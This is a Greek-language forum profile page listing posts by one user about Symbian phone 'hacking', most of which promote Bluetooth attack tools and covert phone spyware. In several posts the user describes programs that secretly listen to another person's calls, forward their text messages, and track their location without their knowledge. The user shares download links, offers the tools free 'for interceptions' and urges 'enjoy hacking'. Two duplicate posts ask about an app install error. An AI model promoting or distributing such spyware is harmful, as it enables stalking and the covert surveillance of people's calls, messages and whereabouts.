Jump to content

pro2006

Members
  • Δημοσιεύσεις

    10
  • Εγγραφή

  • Αξιολογήσεις

    0%

About pro2006

  • Ημ. Γέννησης Απρίλιος 10

pro2006's Achievements

Newbie

Newbie (1/14)

10

Φήμη

  1. Οι δυνατότητες είναι να στείλεις μήνυμα , smile στο άλλο κινητό και να δείς κάποιες πληροφορίες χωρις να καταλαβαινουν οι αλλοι απο που ερχεται !! Αυτο ειναι και το bluejacking :) :)
  2. Μονο symbian, γιαυτο κραζουμε τοσες μερες τον βαγγελη :p το smsforward στελνει μηνυματα σε οποιαδηποτε συσκευη θελεις εφοσον του δηλωσεις το destination number (αλλα η εγκατασταση μονο σε symbian) δειτε και αυτο για bluetooth hacking προγραμματακι http://briefcase.pathfinder.gr/file/nos_55/34812/532550
  3. Αν παλι Θελετε να κανετε σοβαρη δουλεια και οχι αλλα ευαγγελατος ριξτε μια ματια εδω μονο που θα πρεπει να τα χωσετε γιατι το καλο πραγμα πληρωνετε... http://www.detectnu.nl/shop/spyphones-c-138.html
  4. Τα προγραμματα θα μεινουν στο site για περιπου μια ωρα για λογους που πιστευω να καταλαβαινεται...οποιος προλαβει 1.callmagic ακους τις συνομιλιες κανει αυτοματα απαντηση και φυσικα ειναι σε επιπεδο hide ωστε να μην βλεπει ο παρακολουθουμενος τι του γινεται 2.smsforward προωθει τα μηνυματα σε οποιον αριθμο του πειτε τρελλο προγραμμα μονο που χρεωνει τον υποκλοπεα 3.celltrack δεινει τα id kai to cell ωστε να ξερει που βρισκεται ο παρακολουθουμενος 4.bloover το αναφεραται πιο πανω σημερα 5.spycall αυτο γαμαει αλλα δε το εχω σπασει ακομα πρεπει να ειναι trial Aυτα enjoy hacking my friends..
  5. Στο παρακατω link ειναι τα προγραμματα, να ξερετε οτι τρεχουν μονο σε Symbian ειναι sis εφαρμογες, για οσους θελουν οδηγιες για τα interface και το πως λειτουργουν τα πραγραμματα θα πρεπει να το ψαξουν λιγο δε ειναι δυσκολο, στο κατω κατω το δυσκολο ειναι τα βρειτε και τωρα που τα εχετε...ειναι θεμα εξασκησης...;) ;) http://users.auth.gr/~georgep/
  6. Επισης οποιος θελει τα προγραμματα free για υποκλοπες οπως callmagic2_0,celltrack,smsanywhere,spycall,smsforwared ας γραψει το email του.
  7. Οσοι θελετε να κανετε download το bloover καντε κλικ εδω http://trifinite.org/trifinite_stuff_blooover.html
  8. Καλησπερα παιδια ειμαι καινουργιος στο forum και θελω να σας κανω μια ερωτηση. Ξερω οτι η ερωτηση μπορει και να εχει απαντηθει στο παρελθον αν ομως καποιος μπορει να μου δωσει μια λυση η να με κατευθυνει στο αντιστιχο post θα μου ελεινε τα χερια. Προσπαθω να κανω εγκατασταση μιας εφαρμογης sis στο Ν70(δοκιμασα πολλες) και μου δινει το μηνυμα "ΣΦΑΛΜΑ ΑΣΦΑΛΕΙΑΣ ΣΤΗΝ ΕΓΚΑΤΑΣΤΑΣΗ-ΕΓΚΑΤΑΣΤΑΣΗ ΑΔΥΝΑΤΗ" να σημειωσω οτι πολλες απο τις εφαρμογες τις ειχα εγκαταστησει παλιοτερα σε 6600 και δεν ειχα κανενα προβλημα. Λογικα μεσα απο καποιες ρυθμισεις διορθωνεται αλλα πως δεν ξερω..παντως δεν εχει να κανει με το Norton γιατι το απενεργοποιησα και δε καταφερα τιποτα..
  9. Καλησπερα παιδια ειμαι καινουργιος στο forum και θελω να σας κανω μια ερωτηση. Ξερω οτι η ερωτηση μπορει και να εχει απαντηθει στο παρελθον αν ομως καποιος μπορει να μου δωσει μια λυση η να με κατευθυνει στο αντιστιχο post θα μου ελεινε τα χερια. Προσπαθω να κανω εγκατασταση μιας εφαρμογης sis στο Ν70(δοκιμασα πολλες) και μου δινει το μηνυμα "ΣΦΑΛΜΑ ΑΣΦΑΛΕΙΑΣ ΣΤΗΝ ΕΓΚΑΤΑΣΤΑΣΗ-ΕΓΚΑΤΑΣΤΑΣΗ ΑΔΥΝΑΤΗ" να σημειωσω οτι πολλες απο τις εφαρμογες τις ειχα εγκαταστησει παλιοτερα σε 6600 και δεν ειχα κανενα προβλημα. Λογικα μεσα απο καποιες ρυθμισεις διορθωνεται αλλα πως δεν ξερω..παντως δεν εχει να κανει με το Norton γιατι το απενεργοποιησα και δε καταφερα τιποτα..
×
×
  • Create New...